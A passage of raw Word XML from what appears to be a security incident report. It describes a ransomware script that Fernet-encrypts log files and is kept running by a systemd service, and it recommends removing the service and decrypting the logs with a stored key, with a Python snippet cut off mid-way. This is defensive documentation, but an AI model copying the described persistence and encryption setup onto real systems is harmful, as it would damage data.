              </w:numPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:hyperlink r:id="rId29">
              <w:r>
                <w:rPr>
                  <w:color w:val="1155CC"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>https://www.wordfence.com/learn/finding-removing-backdoors/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="04BE0A95" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:hyperlink r:id="rId30">
              <w:r>
                <w:rPr>
                  <w:color w:val="1155CC"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>https://www.techtarget.com/searchsecurity/tip/How-to-remove-ransomware-step-by-step</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2859BBA5" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
      <w:pPr>
        <w:ind w:right="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15806689" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Exploitation Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EA5515" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The /bin/disk_utils.py script has already encrypted </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>all of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the /root/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vese</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-admin/logs files using the Fernet algorithm, and is terminating sessions for connected users every 315 seconds (~5 mins), as highlighted in the following picture of the script’s content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCEF320" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="14B2DD22" wp14:editId="2CDA12E1">
            <wp:extent cx="3343133" cy="1964521"/>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3343133" cy="1964521"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7751ED0F" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1"/>
      </w:pPr>
      <w:r>
        <w:t>By printing the contents of the /root/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vese</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-admin/logs files </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>it is clear that the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> script has already been executed, since the contents of the /root/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vese</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-admin/logs files resemble Fernet content (multiple strings beginning with the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gAAAAABj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” sequence of characters), as shown below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0061DF" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="45131E0D" wp14:editId="0974AA2C">
            <wp:extent cx="5391150" cy="494382"/>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b="35921"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5391150" cy="494382"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B76095" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>systemd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> service in charge of executing the ransomware script is /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>systemd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/system/disk-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>utils.service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, which was created on November 18th at 00:37 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4001134A" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="5BB11E78" wp14:editId="34EABC2F">
            <wp:extent cx="2829878" cy="1021179"/>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2829878" cy="1021179"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="044DCB96" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Contents of /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>systemd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/system/disk-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>utils.service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3787FAD5" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:tblInd w:w="-7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2"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="6F84921A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="76AE7FD6" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Who:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F6B395E" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>IT Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="3E17E930" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="4BE5F02C" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Vector:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F3BA438" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>Remote</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="50E8AE13" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE"/>
          </w:tcPr>
          <w:p w14:paraId="36599F0B" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:right="-170" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
              </w:rPr>
              <w:t>Action:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27374336" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:t>The suggested remediations for this issue are:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E1A3CC5" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">disable and delete the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>systemd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> service in charge of executing the ransomware script</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F9A165A" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>recover the contents of all /root/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vese</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-admin/logs/ files by decrypting them with the key data contained in the /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/security/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>seck.key</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>; the following is an example of how to achieve this using Python</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="af4"/>
              <w:tblW w:w="7288"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88"/>
            </w:tblGrid>
            <w:tr w:rsidR="00BC1FF2" w14:paraId="3FCC8534" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="7288" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
                  <w:tcMar>
                    <w:top w:w="100" w:type="dxa"/>
                    <w:left w:w="100" w:type="dxa"/>
                    <w:bottom w:w="100" w:type="dxa"/>
                    <w:right w:w="100" w:type="dxa"/>
                  </w:tcMar>
                </w:tcPr>
                <w:p w14:paraId="75584ACA" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve">def </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>read_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>key</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>):</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="573A2E41" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve">    </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>my_key_file</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> = "/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>etc</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>/security/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>seck.key</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>"</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6E0D4BA7" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve">    if </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>os.path</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>.exists</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>(</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>my_key_file</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>):</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0F1C2FEB" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve">        with </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>open(</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>my_key_file</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>, '</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>rb</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve">') as </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>myfile</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>:</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="476713BA" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve">            </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>master_key</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> = </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
